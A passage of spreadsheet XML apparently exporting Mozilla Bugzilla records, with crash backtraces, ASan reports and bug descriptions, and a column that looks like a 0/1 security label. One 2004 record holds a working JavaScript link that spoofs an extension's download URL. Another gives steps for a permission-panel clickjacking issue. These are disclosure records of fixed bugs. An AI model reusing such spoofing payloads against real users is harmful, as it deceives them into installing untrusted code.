#13 0x00007fffef50b3b8 in g_closure_invoke () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0
#14 0x00007fffef51cd3d in ?? () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0
#15 0x00007fffef524a29 in g_signal_emit_valist () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0
#16 0x00007fffef525212 in g_signal_emit_by_name () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0
#17 0x00007fffef50b3b8 in g_closure_invoke () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0
#18 0x00007fffef51cd3d in ?? () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0
#19 0x00007fffef524a29 in g_signal_emit_valist () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0
#20 0x00007fffef525212 in g_signal_emit_by_name () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0
#21 0x00007fffeec8d0e7 in ?? () from /usr/lib/x86_64-linux-gnu/libgtk-x11-2.0.so.0
#22 0x00007fffeec903f0 in ?? () from /usr/lib/x86_64-linux-gnu/libgtk-x11-2.0.so.0
#23 0x00007fffef50b5e7 in ?? () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0
#24 0x00007fffef524088 in g_signal_emit_valist () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0
#25 0x00007fffef524ce2 in g_signal_emit () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0
#26 0x00007fffeedd82be in ?? () from /usr/lib/x86_64-linux-gnu/libgtk-x11-2.0.so.0
#27 0x00007fffeeddc868 in ?? () from /usr/lib/x86_64-linux-gnu/libgtk-x11-2.0.so.0
#28 0x00007fffeece4815 in ?? () from /usr/lib/x86_64-linux-gnu/libgtk-x11-2.0.so.0
#29 0x00007fffef50b3b8 in g_closure_invoke () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0
#30 0x00007fffef51cafb in ?? () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0
#31 0x00007fffef5246f9 in g_signal_emit_valist () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0
#32 0x00007fffef524ce2 in g_signal_emit () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0
#33 0x00007fffeedf4684 in ?? () from /usr/lib/x86_64-linux-gnu/libgtk-x11-2.0.so.0
#34 0x00007fffeece2fc4 in gtk_propagate_event () from /usr/lib/x86_64-linux-gnu/libgtk-x11-2.0.so.0
#35 0x00007fffeece337b in gtk_main_do_event () from /usr/lib/x86_64-linux-gnu/libgtk-x11-2.0.so.0
#36 0x00007fffee3c91ec in ?? () from /usr/lib/x86_64-linux-gnu/libgdk-x11-2.0.so.0
#37 0x00007fffef23be04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
---Type &lt;return&gt; to continue, or q &lt;return&gt; to quit---
#38 0x00007fffef23c048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#39 0x00007fffef23c0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#40 0x00007ffff265294c in ?? () from /usr/lib/firefox/libxul.so
#41 0x00007ffff2635b45 in ?? () from /usr/lib/firefox/libxul.so
#42 0x00007ffff2635c74 in ?? () from /usr/lib/firefox/libxul.so
#43 0x00007ffff1706f8d in ?? () from /usr/lib/firefox/libxul.so
#44 0x00007ffff17187ce in ?? () from /usr/lib/firefox/libxul.so
#45 0x00007ffff18c690d in ?? () from /usr/lib/firefox/libxul.so
#46 0x00007ffff18b7515 in ?? () from /usr/lib/firefox/libxul.so
#47 0x00007ffff262e2b1 in ?? () from /usr/lib/firefox/libxul.so
#48 0x00007ffff2b3a3c7 in ?? () from /usr/lib/firefox/libxul.so
#49 0x00007ffff2b6b8ec in ?? () from /usr/lib/firefox/libxul.so
#50 0x00007ffff2b6bbdd in ?? () from /usr/lib/firefox/libxul.so
#51 0x00007ffff2b6be68 in XRE_main () from /usr/lib/firefox/libxul.so
#52 0x0000555555558451 in _start ()
and the faulty instruction is examined here:
(gdb) x/i $rip
=&gt; 0x7fffb9a32ebc:	mov    0x8(%r14),%rax
(gdb) info register
rax            0x7fffbed04cc0	140736394710208
rbx            0x7fffbd700068	140736371621992
rcx            0xffd9	65497
rdx            0x7fffb9c61c68	140736310156392
rsi            0x5a5a5a5a	1515870810
rdi            0x3	3
rbp            0x2	0x2
rsp            0x7fffffff9a50	0x7fffffff9a50
r8             0xffd9	65497
r9             0x7fffbed87000	140736395243520
r10            0x7ffff6c000c8	140737333166280
r11            0x7ffff6c00680	140737333167744
r12            0x7fffbed04a80	140736394709632
r13            0x7fffbed04ae8	140736394709736
r14            0x0	0
r15            0x7fffffffae60	140737488334432
rip            0x7fffb9a32ebc	0x7fffb9a32ebc
eflags         0x10206	[ PF IF RF ]
cs             0x33	51
ss             0x2b	43
ds             0x0	0
es             0x0	0
fs             0x0	0
gs             0x0	0
For this concrete example, it was just a null dereference and more than a DoS is unlikely to happen but next time we could find a worse case.
Expected results:
I think we should disable image preview for jpeg until gdk-pixbuf change Jasper for a more modern implementation of jpeg decoding (e.g, openjpeg)</t>
        </is>
      </c>
      <c r="X2150" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2151">
      <c r="A2151" t="n">
        <v>1300139</v>
      </c>
      <c r="B2151" t="inlineStr">
        <is>
          <t>2016-09-02 09:46:49 -0700</t>
        </is>
      </c>
      <c r="C2151" t="inlineStr">
        <is>
          <t>Intermittent java-exception | java.lang.NullPointerException at java.lang.String.&lt;init&gt;(String.java:447)</t>
        </is>
      </c>
      <c r="D2151" t="inlineStr">
        <is>
          <t>2020-12-21 10:36:12 -0800</t>
        </is>
      </c>
      <c r="E2151" t="n">
        <v>1</v>
      </c>
      <c r="F2151" t="n">
        <v>1</v>
      </c>
      <c r="G2151" t="n">
        <v>6</v>
      </c>
      <c r="H2151" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2151" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J2151" t="inlineStr">
        <is>
          <t>Testing</t>
        </is>
      </c>
      <c r="K2151" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2151" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2151" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2151" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2151" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2151" t="inlineStr"/>
      <c r="Q2151" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2151" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2151" t="inlineStr">
        <is>
          <t>Firefox 51</t>
        </is>
      </c>
      <c r="T2151" t="n">
        <v>1</v>
      </c>
      <c r="U2151" t="n">
        <v>0</v>
      </c>
      <c r="V2151" t="n">
        <v>9</v>
      </c>
      <c r="W2151" t="inlineStr">
        <is>
          <t>Filed by: philringnalda [at] gmail.com
https://treeherder.mozilla.org/logviewer.html#?job_id=35189530&amp;repo=mozilla-inbound
https://queue.taskcluster.net/v1/task/USvwiZLmSMmoHtjt5FdT-g/runs/0/artifacts/public%2Flogs%2Flive_backing.log</t>
        </is>
      </c>
      <c r="X2151" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2152">
      <c r="A2152" t="n">
        <v>1090248</v>
      </c>
      <c r="B2152" t="inlineStr">
        <is>
          <t>2014-10-28 07:30:35 -0700</t>
        </is>
      </c>
      <c r="C2152" t="inlineStr">
        <is>
          <t>Split PostgreSQLAlchemyManager module into separate file</t>
        </is>
      </c>
      <c r="D2152" t="inlineStr">
        <is>
          <t>2014-10-28 07:59:05 -0700</t>
        </is>
      </c>
      <c r="E2152" t="n">
        <v>1</v>
      </c>
      <c r="F2152" t="n">
        <v>1</v>
      </c>
      <c r="G2152" t="n">
        <v>4</v>
      </c>
      <c r="H2152" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2152" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2152" t="inlineStr">
        <is>
          <t>Database</t>
        </is>
      </c>
      <c r="K2152" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2152" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2152" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2152" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2152" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2152" t="inlineStr"/>
      <c r="Q2152" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2152" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2152" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2152" t="n">
        <v>1</v>
      </c>
      <c r="U2152" t="n">
        <v>0</v>
      </c>
      <c r="V2152" t="n">
        <v>2</v>
      </c>
      <c r="W2152" t="inlineStr">
        <is>
          <t>Housecleaning in anticipation of dividing the schema up and creating a new create database app.</t>
        </is>
      </c>
      <c r="X2152" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2153">
      <c r="A2153" t="n">
        <v>698910</v>
      </c>
      <c r="B2153" t="inlineStr">
        <is>
          <t>2011-11-01 15:02:34 -0700</t>
        </is>
      </c>
      <c r="C2153" t="inlineStr">
        <is>
          <t>Generate "l10n repack" status reports</t>
        </is>
      </c>
      <c r="D2153" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E2153" t="n">
        <v>1</v>
      </c>
      <c r="F2153" t="n">
        <v>1</v>
      </c>
      <c r="G2153" t="n">
        <v>5</v>
      </c>
      <c r="H2153" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2153" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2153" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2153" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2153" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2153" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2153" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2153" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2153" t="inlineStr">
        <is>
          <t>[l10n]</t>
        </is>
      </c>
      <c r="Q2153" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2153" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2153" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2153" t="n">
        <v>1</v>
      </c>
      <c r="U2153" t="n">
        <v>0</v>
      </c>
      <c r="V2153" t="n">
        <v>25</v>
      </c>
      <c r="W2153" t="inlineStr">
        <is>
          <t>When we tried to disable tinderbox mail everywhere we broke the only public reporting tool for localization [1]. This is for both L10n nightly builds and L10n dep builds.
I would like to work with you guys to create a web site that can allow us to know:
* for a branch
* for every platform we support
* for every locale
A proof of concept for that is http://l10n.mozilla.org/~axel/nightlies but it is based on tinderbox.
Currently the same data can be retrieved from our json dumps [2]
I want to answer these questions:
- Did an L10n nightly get generated?
- Did the job succeed/fail?
- Where is the log?
- Where is the nightly build?
Particularly I need:
1) where to host this dashboard
2) how to parse the logs (I really don't know how parsers work)
   - tbpl uses [3]
   - tinderbox uses [4]
3) Answer the questions listed above
   - on tbox we have a "L" link for the log
   - "D" log to point to the builds
   - green/red colours to indicate status
To see the nightly builds I imagine something like this:
* www.L10n-builds?type=nightly&amp;date=2011-10-31
To see the dep builds I can imagine something like this:
* www.L10n-builds?type=dep&amp;locale=ab-CD
** we would have to deal with the lack of commits
If we look at [5] we can see that I can load up a .js file and filter L10n nightly and dep jobs. Then I can get information from the "properties" key and generate all of the information I need.
I can write an script that can extract all the info we need but I don't know anything about what is the right way to do 2) and/or proper practices to create a web page out of that info. If you help me with 1) and 2) I can help with 3) (if you give me some guidelines on how to web-ize it).
[1] http://tinderbox.mozilla.org/showbuilds.cgi?tree=Mozilla-l10n
[2] http://build.mozilla.org/builds/builds-2011-10-31.js.gz
[3] https://tbpl.mozilla.org/php/getParsedLog.php?id=7147494&amp;tree=Firefox&amp;full=1
[4] http://tinderbox.mozilla.org/showlog.cgi?log=Mozilla-l10n/1320176137.1320176826.19693.gz&amp;fulltext=1
[5]
j = json.load(open('builds-2011-10-30.js'));
for item in j["builds"]:
    if item["properties"].get("buildername", "").endswith("l10n nightly")
        # we have an L10n nightly job
    if item["properties"].get("buildername", "").endswith("l10n nightly")
        # we have an L10n dep job
[6] L10n nightly log and download:
* http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-mozilla-central-l10n/mozilla-central-macosx64-l10n-nightly-ka-build6978.txt.gz
* http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-mozilla-central-l10n/firefox-10.0a1.pl.linux-x86_64.tar.bz2
[7] L10n *dep* log and download:
* http://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-l10n/mozilla-central-linux-l10n-dep-ar-build202.txt.gz
* http://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-l10n/firefox-10.0a1.zh-TW.linux-i686.tar.bz2</t>
        </is>
      </c>
      <c r="X2153" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2154">
      <c r="A2154" t="n">
        <v>268059</v>
      </c>
      <c r="B2154" t="inlineStr">
        <is>
          <t>2004-11-05 23:57:08 -0800</t>
        </is>
      </c>
      <c r="C2154" t="inlineStr">
        <is>
          <t>InstallTrigger.install doesn't check for username:password URL spoofing</t>
        </is>
      </c>
      <c r="D2154" t="inlineStr">
        <is>
          <t>2015-12-11 07:21:56 -0800</t>
        </is>
      </c>
      <c r="E2154" t="n">
        <v>1</v>
      </c>
      <c r="F2154" t="n">
        <v>1</v>
      </c>
      <c r="G2154" t="n">
        <v>6</v>
      </c>
      <c r="H2154" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2154" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J2154" t="inlineStr">
        <is>
          <t>Installer: XPInstall Engine</t>
        </is>
      </c>
      <c r="K2154" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2154" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2154" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2154" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2154" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2154" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q2154" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2154" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2154" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2154" t="n">
        <v>1</v>
      </c>
      <c r="U2154" t="n">
        <v>0</v>
      </c>
      <c r="V2154" t="n">
        <v>17</v>
      </c>
      <c r="W2154" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20041101 Firefox/1.0RC2
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20041101 Firefox/1.0RC2
Between not checking for a spoofed URL with a username/password, and the
unresizeable, unwrapped dialog for XPInstall, it's possible to make a fairly
convincing spoofed URL for an XPI with InstallTrigger:
&lt;a href="javascript:void(InstallTrigger.install({'Safety
First!':'http://update%2Emozilla%2Eorg%5C%5Cextensions%5C%5Csafe_as_houses@philringnalda.com/mozilla/livemarkthis.xpi'}))"&gt;Install
from update.mozilla.org&lt;/a&gt;
The install dialog (with my font size, on WinXP) will then say the xpi is coming
from |http://update.mozilla.org\extensions\safe_a|, with the full URL only
visible by copying and pasting into another program.
I'm not sure if it's possible to get a more convincing URL than that, thanks to
other bugs I discovered while trying (the EM apparently misparses URLs, so any /
in the username (even as %2F) causes a download failure, and the install dialog
treats \ as an escape (even as %5C), so a pair are required to display one). If
that's the very best spoofed URL possible, it's not quite earth-shaking serious,
but then I'm not a very good spoofer.
Reproducible: Always
Steps to Reproduce:
1. Visit URL, click link to install.
2. Add site to install-prompt whitelist.
3. Click link again to really install.
4. Vaguely examine URL in install prompt, think "update.mozilla.org, that's safe"
Actual Results:  
The extension (it's just my right-click "Add Live Bookmark for this link", safe
enough to actually install) was installed.
Expected Results:  
Throw up the spoof-warning alert before the install prompt.</t>
        </is>
      </c>
      <c r="X2154" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2155">
      <c r="A2155" t="n">
        <v>1716129</v>
      </c>
      <c r="B2155" t="inlineStr">
        <is>
          <t>2021-06-12 05:09:38 -0700</t>
        </is>
      </c>
      <c r="C2155" t="inlineStr">
        <is>
          <t>Moving Permission Panel with Click Still Registered in Default Position on GTK</t>
        </is>
      </c>
      <c r="D2155" t="inlineStr">
        <is>
          <t>2024-05-30 10:32:19 -0700</t>
        </is>
      </c>
      <c r="E2155" t="n">
        <v>1</v>
      </c>
      <c r="F2155" t="n">
        <v>1</v>
      </c>
      <c r="G2155" t="n">
        <v>3</v>
      </c>
      <c r="H2155" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2155" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2155" t="inlineStr">
        <is>
          <t>Widget: Gtk</t>
        </is>
      </c>
      <c r="K2155" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2155" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2155" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2155" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2155" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2155" t="inlineStr">
        <is>
          <t>[clickjacking our UX][reporter-external] [client-bounty-form] [verif?][adv-main91+]</t>
        </is>
      </c>
      <c r="Q2155" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2155" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S2155" t="inlineStr">
        <is>
          <t>91 Branch</t>
        </is>
      </c>
      <c r="T2155" t="n">
        <v>1</v>
      </c>
      <c r="U2155" t="n">
        <v>0</v>
      </c>
      <c r="V2155" t="n">
        <v>14</v>
      </c>
      <c r="W2155" t="inlineStr">
        <is>
          <t>Created attachment 9226647
moving-permission-panel.html
After request multiple permission at the same time, then after first interaction to the permission panel, the second permission panel will moving to another position with click button still registered on default position, which lead user unintentionally click "Allow" on the permission button.
I noticed it currently affects Linux distributions that [use KDE as the desktop environment](https://kde.org/distributions):
- Kubuntu
- openSUSE
- KDE Neon
- Fedora KDE
- Manjaro KDE
When using mozregression the permission panel is moving out after checkout to commit [Notification anchors are not hidden when the user types in the location bar](https://hg.mozilla.org/mozreview/gecko/rev/01e65782d6cab60482dc269f908227c1c0598063).
## Tested on:
- Arch Linux with KDE as default Desktop Environment
- Kubuntu 21.04 on VM
## Steps to reproduce:
1. Open Firefox on KDE (desktop environment)
2. Visit attached moving-permission-panel.html
3. When first permission dialog appear then press 'esc' 
4. The second permission dialog will appear on another position with click still registered on original doorhanger position
5. Click on "Click to Continue" button
6. Microphone or geolocation permission is now allowed</t>
        </is>
      </c>
      <c r="X2155" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2156">
      <c r="A2156" t="n">
        <v>1002340</v>
      </c>
      <c r="B2156" t="inlineStr">
        <is>
          <t>2014-04-28 00:02:57 -0700</t>
        </is>
      </c>
      <c r="C2156" t="inlineStr">
        <is>
          <t>Shutdown crash with many mozGetUserMedia calls</t>
        </is>
      </c>
      <c r="D2156" t="inlineStr">
        <is>
          <t>2015-08-30 12:11:48 -0700</t>
        </is>
      </c>
      <c r="E2156" t="n">
        <v>1</v>
      </c>
      <c r="F2156" t="n">
        <v>1</v>
      </c>
      <c r="G2156" t="n">
        <v>3</v>
      </c>
      <c r="H2156" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2156" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2156" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K2156" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2156" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2156" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2156" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2156" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2156" t="inlineStr">
        <is>
          <t>[adv-main30+]</t>
        </is>
      </c>
      <c r="Q2156" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2156" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2156" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T2156" t="n">
        <v>1</v>
      </c>
      <c r="U2156" t="n">
        <v>0</v>
      </c>
      <c r="V2156" t="n">
        <v>29</v>
      </c>
      <c r="W2156" t="inlineStr">
        <is>
          <t>Created attachment 8413568
testcase
1. Load the testcase in an ASan build of Firefox
2. Quit Firefox
Result: it usually crashes, but not always in the same place</t>
        </is>
      </c>
      <c r="X2156" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2157">
      <c r="A2157" t="n">
        <v>1660211</v>
      </c>
      <c r="B2157" t="inlineStr">
        <is>
          <t>2020-08-20 04:27:58 -0700</t>
        </is>
      </c>
      <c r="C2157" t="inlineStr">
        <is>
          <t>Iterator invalidation potentially causing memory corruption</t>
        </is>
      </c>
      <c r="D2157" t="inlineStr">
        <is>
          <t>2024-05-30 10:18:08 -0700</t>
        </is>
      </c>
      <c r="E2157" t="n">
        <v>1</v>
      </c>
      <c r="F2157" t="n">
        <v>1</v>
      </c>
      <c r="G2157" t="n">
        <v>3</v>
      </c>
      <c r="H2157" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2157" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2157" t="inlineStr">
        <is>
          <t>Panning and Zooming</t>
        </is>
      </c>
      <c r="K2157" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2157" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2157" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2157" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2157" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2157" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main81+][adv-esr78.3+]</t>
        </is>
      </c>
      <c r="Q2157" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2157" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2157" t="inlineStr">
        <is>
          <t>81 Branch</t>
        </is>
      </c>
      <c r="T2157" t="n">
        <v>1</v>
      </c>
      <c r="U2157" t="n">
        <v>0</v>
      </c>
      <c r="V2157" t="n">
        <v>20</v>
      </c>
      <c r="W2157" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Steps to reproduce:
The function `ComputeClippedCompositionBounds` in APZCTreeManager.cpp is not following iterator invalidation rules, potentially causing memory corruption.
The return value of the `aDestMap.insert` holds an iterator to the inserted key.
https://searchfox.org/mozilla-central/rev/6cc48251bb97600fdf11a5b4c5f621bfc8606d55/gfx/layers/apz/src/APZCTreeManager.cpp#902
Recursively calling `ComputeClippedCompositionBounds` potentially invalidates the iterator, depending on whether the insert caused a rehash of the std::unordered_map.
https://searchfox.org/mozilla-central/rev/6cc48251bb97600fdf11a5b4c5f621bfc8606d55/gfx/layers/apz/src/APZCTreeManager.cpp#929
The (potentially invalid) iterator is used to insert another value.
https://searchfox.org/mozilla-central/rev/6cc48251bb97600fdf11a5b4c5f621bfc8606d55/gfx/layers/apz/src/APZCTreeManager.cpp#953
I'm not sure whether an adversary is able to reach the code path while exercising sufficient control over the input variables. Hence the severity from a security standpoint remains unclear to me, feel free to de-restrict the bug report.</t>
        </is>
      </c>
      <c r="X2157" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2158">
      <c r="A2158" t="n">
        <v>758200</v>
      </c>
      <c r="B2158" t="inlineStr">
        <is>
          <t>2012-05-24 06:56:58 -0700</t>
        </is>
      </c>
      <c r="C2158" t="inlineStr">
        <is>
          <t>ASAN: Heap-buffer-overflow at image::RasterImage::DrawFrameTo</t>
        </is>
      </c>
      <c r="D2158" t="inlineStr">
        <is>
          <t>2024-05-29 16:01:23 -0700</t>
        </is>
      </c>
      <c r="E2158" t="n">
        <v>1</v>
      </c>
      <c r="F2158" t="n">
        <v>1</v>
      </c>
      <c r="G2158" t="n">
        <v>3</v>
      </c>
      <c r="H2158" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2158" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2158" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K2158" t="inlineStr">
        <is>
          <t>Other Branch</t>
        </is>
      </c>
      <c r="L2158" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2158" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2158" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2158" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2158" t="inlineStr">
        <is>
          <t>[asan][adv-track-main17+][adv-track-esr17+][qa-]</t>
        </is>
      </c>
      <c r="Q2158" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2158" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2158" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T2158" t="n">
        <v>1</v>
      </c>
      <c r="U2158" t="n">
        <v>0</v>
      </c>
      <c r="V2158" t="n">
        <v>45</v>
      </c>
      <c r="W2158" t="inlineStr">
        <is>
          <t>Created attachment 626785
Repro-gifs and html
This bug seems to be some sort of race condition. The bug is fairly hard to reproduce, but I was able to reproduce it with the files in the attached zip and with the build from http://ftp.mozilla.org/pub/mozilla.org/firefox/try-builds/decoder@own-hero.net-9751d29c325
d/try-linux64-debug/firefox-15.0a1.en-US.linux-x86_64.tar.bz2
ASAN report: ( Using build from http://ftp.mozilla.org/pub/mozilla.org/firefox/try-builds/decoder@own-hero.net-9751d29c325
d/try-linux64-debug/firefox-15.0a1.en-US.linux-x86_64.tar.bz2 )
==31319== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7fd2b6d89e80 at pc 0x7fd305566383 bp 0x7fff393c7c10 sp 0x7fff393c7c08
READ of size 4 at 0x7fd2b6d89e80 thread T0
    #0 0x7fd305566383 in mozilla::image::RasterImage::DrawFrameTo(imgFrame*, imgFrame*, nsIntRect&amp;) /builds/slave/try-lnx64-dbg/build/image/src/RasterImage.cpp:2070
    #1 0x7fd30555c2ec in mozilla::image::RasterImage::DoComposite(nsIntRect*, imgFrame*, imgFrame*, int) /builds/slave/try-lnx64-dbg/build/image/src/RasterImage.cpp:1885
    #2 0x7fd30555af67 in mozilla::image::RasterImage::AdvanceFrame(mozilla::TimeStamp, nsIntRect*) /builds/slave/try-lnx64-dbg/build/image/src/RasterImage.cpp:369
    #3 0x7fd30555c96b in mozilla::image::RasterImage::RequestRefresh(mozilla::TimeStamp const&amp;) /builds/slave/try-lnx64-dbg/build/image/src/RasterImage.cpp:412
    #4 0x7fd30575563d in nsRefreshDriver::ImageRequestEnumerator(nsISupportsHashKey*, void*) /builds/slave/try-lnx64-dbg/build/layout/base/nsRefreshDriver.cpp:454
    #5 0x7fd3075e906b in PL_DHashTableEnumerate /builds/slave/try-lnx64-dbg/build/obj-firefox/xpcom/build/pldhash.cpp:715
    #6 0x7fd30575545a in nsTHashtable&lt;nsISupportsHashKey&gt;::EnumerateEntries(PLDHashOperator (*)(nsISupportsHashKey*, void*), void*) /builds/slave/try-lnx64-dbg/build/../../dist/include/nsTHashtable.h:237
    #7 0x7fd305754dda in nsRefreshDriver::Notify(nsITimer*) /builds/slave/try-lnx64-dbg/build/layout/base/nsRefreshDriver.cpp:410
    #8 0x7fd30769fdff in nsTimerImpl::Fire() /builds/slave/try-lnx64-dbg/build/xpcom/threads/nsTimerImpl.cpp:476
